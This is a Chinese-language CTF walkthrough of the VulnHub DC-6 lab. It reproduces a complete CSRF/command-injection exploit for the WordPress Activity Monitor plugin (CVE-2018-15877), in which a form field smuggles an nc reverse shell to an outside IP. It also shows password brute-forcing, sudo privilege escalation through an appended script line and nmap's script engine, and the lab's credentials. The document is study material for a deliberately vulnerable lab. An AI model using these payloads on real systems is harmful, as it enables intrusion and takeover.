vulnhub-DC6笔记

1.nmap -sP 192.168.0.100/24 老规矩内网扫描锁定靶机ip

2.nmap -A -p 1-65535 192.168.0.141 端口扫描，开放22/80

3.dirb http://192.168.0.141 看一下目录，火狐看一下发现是wordpress

4.wpscan --url http://wordy -e u 得到五个可能的用户admin/graham/mark/sarah/jens

5.cewl http://wordy -w passwd.txt 爬取制造密码；wpscan --url http://wordy --usernames /root/Desktop/username.txt --passwords /root/Desktop/password.txt 结果No Valid Passwords Found.失败了……；

6.去官网找了下提示gunzip rockyou.txt.gz

cat /usr/share/wordlists/rockyou.txt | grep k01 > passwords.txt获取密码
wpscan --url http://wordy --usernames /root/Desktop/username.txt --passwords /root/Desktop/passwords.txt
获得mark:helpdesk01
7.wordpress漏洞主要存在在插件里，我们登录发现使用activity monitor这个插件。我们也可以通过wpsacn也可以枚举到这个插件：wpscan --url http://wordy --plugins-detection aggressive
8.searchsploit activity monitor 看看有没有漏洞存在，发现一个远程代码执行漏洞，选用命令注入的那个
需要改域名和kali的ip
<html>
<!-- WordPress Plainview Activity Monitor RCE
[+] Version: 20161228 and possibly prior
[+] Description: Combine OS Commanding and CSRF to get reverse shell
[+] Author: LydA(c)ric LEFEBVRE
[+] CVE-ID: CVE-2018-15877
[+] Usage: Replace 127.0.0.1 & 9999 with you ip and port to get reverse shell
[+] Note: Many reflected XSS exists on this plugin and can be combine with this exploit as well
-->
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://wordy/wp-admin/admin.php?page=plainview_activity_monitor&tab=activity_tools" method="POST" enctype="multipart/form-data">
<input type="hidden" name="ip" value="google.fr| nc 192.168.0.103 9999 -e /bin/bash" />
<input type="hidden" name="lookup" value="Lookup" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>

9.python -m SimpleHTTPServer 80利用python起一个http服务
  nc -lvp 9999  kali监听
  192.168.0.103/123.html，点击摁扭，反弹shell
10.cd /home   ； ls一下看看每个用户下有什么东西,在stuff里面发现things-to-do.txt，发现用户密码
graham:GSo7isUM1D4
11.python -c 'import pty;pty.spawn("/bin/bash")'
sudo -l 查看graham用户有哪些特殊的权限，发现可以以jens用户且不使用口令的情况下使用backups.sh：
12.cd /home/jens ; cat backups.sh 看一下backups.sh是啥，发现是bash脚本，末尾/bin/bash或者/bin/sh获取权限即可
13.echo "/bin/sh" >> backups.sh   提示我们用/bin/sh
14.sudo -u jens ./backups.sh   以jens身份运行文件
15.获得jens权限sudo -l 看一下，我们可以使用nmap，利用nmap提权
16.nmap -v 看看版本
echo 'os.execute("/bin/bash")' > shell
sudo nmap --script=shell
17.cd /root
cat theflag.txt

Yb dP 888888 88 88 8888b. dP"Yb 88b 88 888888 d8b
Yb db dP 88__ 88 88 8I Yb dP Yb 88Yb88 88__ Y8P
YbdPYbdP 88"" 88 .o 88 .o 8I dY Yb dP 88 Y88 88"" `"'
YP YP 888888 88ood8 88ood8 8888Y" YbodP 88 Y8 888888 (8)

Congratulations!!!

Hope you enjoyed DC-6. Just wanted to send a big thanks out there to all those
who have provided feedback, and who have taken time to complete these little
challenges.

If you enjoyed this CTF, send me a tweet via @DCAU7.

收获：

1.nmap 提权

2.sudo -u jens ./backups.sh以其他人身份运行程序

3.activity monitor插件漏洞